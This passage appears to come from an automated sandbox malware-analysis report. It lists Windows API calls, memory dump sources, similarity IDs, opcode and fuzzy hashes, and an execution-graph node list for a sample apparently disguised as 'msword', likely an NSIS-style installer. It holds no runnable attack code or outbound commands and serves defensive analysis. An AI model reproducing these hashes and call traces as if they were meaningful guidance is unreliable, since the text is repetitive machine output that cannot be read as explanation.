                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            Strings
                                                                            • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                            • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                            • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                            • API String ID: 1697273262-1764544995
                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 00404902
                                                                            • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                              • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                            • String ID: $@rD
                                                                            • API String ID: 3748168415-881980237
                                                                            APIs
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                              • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                              • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                            • lstrlenW.KERNEL32 ref: 004026B4
                                                                            • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                            • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                            • String ID: CopyFiles "%s"->"%s"
                                                                            • API String ID: 2577523808-3778932970
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcatwsprintf
                                                                            • String ID: %02x%c$...
                                                                            • API String ID: 3065427908-1057055748
                                                                            APIs
                                                                            • OleInitialize.OLE32(00000000), ref: 00405057
                                                                              • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                            • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                            • String ID: Section: "%s"$Skipping section: "%s"
                                                                            • API String ID: 2266616436-4211696005
                                                                            • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                            • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                            • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                            • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                            APIs
                                                                            • GetDC.USER32(?), ref: 00402100
                                                                            • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                              • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                            • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                              • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                            • String ID:
                                                                            • API String ID: 1599320355-0
                                                                            • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                            • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                            • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                                            • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                                            APIs
                                                                              • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                            • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                            • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                            • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcpyn$CreateFilelstrcmp
                                                                            • String ID: Version
                                                                            • API String ID: 512980652-315105994
                                                                            • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                            • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                                            • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                            • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                                            APIs
                                                                            • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                            • GetTickCount.KERNEL32 ref: 00403303
                                                                            • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                            • String ID:
                                                                            • API String ID: 2102729457-0
                                                                            • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                            • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                                            • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                            • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                            • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                            • String ID:
                                                                            • API String ID: 2883127279-0
                                                                            • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                            • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                                            • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                            • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                                            APIs
                                                                            • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                            • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileStringlstrcmp
                                                                            • String ID: !N~
                                                                            • API String ID: 623250636-529124213
                                                                            • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                            • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                                            • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                            • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                                            APIs
                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                            • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                            Strings
                                                                            • Error launching installer, xrefs: 00405C48
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleProcess
                                                                            • String ID: Error launching installer
                                                                            • API String ID: 3712363035-66219284
                                                                            • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                            • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                                            • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                            • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                            • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                              • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandlelstrlenwvsprintf
                                                                            • String ID: RMDir: RemoveDirectory invalid input("")
                                                                            • API String ID: 3509786178-2769509956
                                                                            • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                            • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                                            • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                            • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                                            APIs
                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                            • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                            • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                            • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 190613189-0
                                                                            • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                            • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                                            • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                            • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                                            Execution Graph

                                                                            Execution Coverage:4.3%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:2.2%
                                                                            Total number of Nodes:2000
                                                                            Total number of Limit Nodes:100
                                                                            execution_graph 97831 271066 97836 27aaaa 97831->97836 97833 27106c 97869 292f70 97833->97869 97837 27aacb 97836->97837 97872 2902eb 97837->97872 97841 27ab12 97882 281207 97841->97882 97844 281207 59 API calls 97845 27ab26 97844->97845 97846 281207 59 API calls 97845->97846 97847 27ab30 97846->97847 97848 281207 59 API calls 97847->97848 97849 27ab6e 97848->97849 97850 281207 59 API calls 97849->97850 97851 27ac39 97850->97851 97887 290588 97851->97887 97855 27ac6b 97856 281207 59 API calls 97855->97856 97857 27ac75 97856->97857 97915 28fe2b 97857->97915 97859 27acbc 97860 27accc GetStdHandle 97859->97860 97861 2b2f39 97860->97861 97862 27ad18 97860->97862 97861->97862 97863 2b2f42 97861->97863 97864 27ad20 OleInitialize 97862->97864 97922 2d70f3 64 API calls Mailbox 97863->97922 97864->97833 97866 2b2f49 97923 2d77c2 CreateThread 97866->97923 97868 2b2f55 CloseHandle 97868->97864 97995 292e74 97869->97995 97871 271076 97924 2903c4 97872->97924 97875 2903c4 59 API calls 97876 29032d 97875->97876 97877 281207 59 API calls 97876->97877 97878 290339 97877->97878 97931 281821 97878->97931 97880 27aad1 97881 2907bb 6 API calls 97880->97881 97881->97841 97883 290fe6 Mailbox 59 API calls 97882->97883 97884 281228 97883->97884 97885 290fe6 Mailbox 59 API calls 97884->97885 97886 27ab1c 97885->97886 97886->97844 97888 281207 59 API calls 97887->97888 97889 290598 97888->97889 97890 281207 59 API calls 97889->97890 97891 2905a0 97890->97891 97990 2810c3 97891->97990 97894 2810c3 59 API calls 97895 2905b0 97894->97895 97896 281207 59 API calls 97895->97896 97897 2905bb 97896->97897 97898 290fe6 Mailbox 59 API calls 97897->97898 97899 27ac43 97898->97899 97900 28ff4c 97899->97900 97901 28ff5a 97900->97901 97902 281207 59 API calls 97901->97902 97903 28ff65 97902->97903 97904 281207 59 API calls 97903->97904 97905 28ff70 97904->97905 97906 281207 59 API calls 97905->97906 97907 28ff7b 97906->97907 
97908 281207 59 API calls 97907->97908 97909 28ff86 97908->97909 97910 2810c3 59 API calls 97909->97910 97911 28ff91 97910->97911 97912 290fe6 Mailbox 59 API calls 97911->97912 97913 28ff98 RegisterWindowMessageW 97912->97913 97913->97855 97916 2c620c 97915->97916 97917 28fe3b 97915->97917 97993 2da12a 59 API calls 97916->97993 97919 290fe6 Mailbox 59 API calls 97917->97919 97921 28fe43 97919->97921 97920 2c6217 97921->97859 97922->97866 97923->97868 97994 2d77a8 65 API calls 97923->97994 97925 281207 59 API calls 97924->97925 97926 2903cf 97925->97926 97927 281207 59 API calls 97926->97927 97928 2903d7 97927->97928 97929 281207 59 API calls 97928->97929 97930 290323 97929->97930 97930->97875 97932 28189a 97931->97932 97933 28182d __NMSG_WRITE 97931->97933 97944 281981 97932->97944 97936 281868 97933->97936 97937 281843 97933->97937 97935 28184b _memmove 97935->97880 97941 281c7e 97936->97941 97940 281b7c 59 API calls Mailbox 97937->97940 97940->97935 97948 290fe6 97941->97948 97943 281c88 97943->97935 97945 28198f 97944->97945 97947 281998 _memmove 97944->97947 97945->97947 97986 281aa4 97945->97986 97947->97935 97951 290fee 97948->97951 97950 291008 97950->97943 97951->97950 97953 29100c std::exception::exception 97951->97953 97958 29593c 97951->97958 97975 2935d1 DecodePointer 97951->97975 97976 2987cb RaiseException 97953->97976 97955 291036 97977 298701 58 API calls _free 97955->97977 97957 291048 97957->97943 97959 2959b7 97958->97959 97967 295948 97958->97967 97984 2935d1 DecodePointer 97959->97984 97961 2959bd 97985 298d58 58 API calls __getptd_noexit 97961->97985 97964 29597b RtlAllocateHeap 97964->97967 97974 2959af 97964->97974 97966 2959a3 97982 298d58 58 API calls __getptd_noexit 97966->97982 97967->97964 97967->97966 97971 2959a1 97967->97971 97972 295953 97967->97972 97981 2935d1 DecodePointer 97967->97981 97983 298d58 58 API calls __getptd_noexit 97971->97983 97972->97967 97978 29a39b 58 API calls 2 library calls 97972->97978 97979 29a3f8 58 API 
calls 7 library calls 97972->97979 97980 2932cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97972->97980 97974->97951 97975->97951 97976->97955 97977->97957 97978->97972 97979->97972 97981->97967 97982->97971 97983->97974 97984->97961 97985->97974 97987 281ab7 97986->97987 97989 281ab4 _memmove 97986->97989 97988 290fe6 Mailbox 59 API calls 97987->97988 97988->97989 97989->97947 97991 281207 59 API calls 97990->97991 97992 2810cb 97991->97992 97992->97894 97993->97920 97996 292e80 _fseek 97995->97996 98003 293447 97996->98003 98002 292ea7 _fseek 98002->97871 98020 299e3b 98003->98020 98005 292e89 98006 292eb8 DecodePointer DecodePointer 98005->98006 98007 292ee5 98006->98007 98008 292e95 98006->98008 98007->98008 98066 2989d4 59 API calls __beginthreadex 98007->98066 98017 292eb2 98008->98017 98010 292f48 EncodePointer EncodePointer 98010->98008 98011 292f1c 98011->98008 98015 292f36 EncodePointer 98011->98015 98068 298a94 61 API calls 2 library calls 98011->98068 98012 292ef7 98012->98010 98012->98011 98067 298a94 61 API calls 2 library calls 98012->98067 98015->98010 98016 292f30 98016->98008 98016->98015 98069 293450 98017->98069 98021 299e4c 98020->98021 98022 299e5f EnterCriticalSection 98020->98022 98027 299ec3 98021->98027 98022->98005 98024 299e52 98024->98022 98051 2932e5 58 API calls 3 library calls 98024->98051 98028 299ecf _fseek 98027->98028 98029 299ed8 98028->98029 98030 299ef0 98028->98030 98052 29a39b 58 API calls 2 library calls 98029->98052 98033 299f11 _fseek 98030->98033 98055 298a4d 58 API calls __malloc_crt 98030->98055 98033->98024 98034 299edd 98053 29a3f8 58 API calls 7 library calls 98034->98053 98035 299f05 98037 299f1b 98035->98037 98038 299f0c 98035->98038 98041 299e3b __lock 58 API calls 98037->98041 98056 298d58 58 API calls __getptd_noexit 98038->98056 98039 299ee4 98054 2932cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98039->98054 98044 299f22 98041->98044 98045 299f2f 98044->98045 
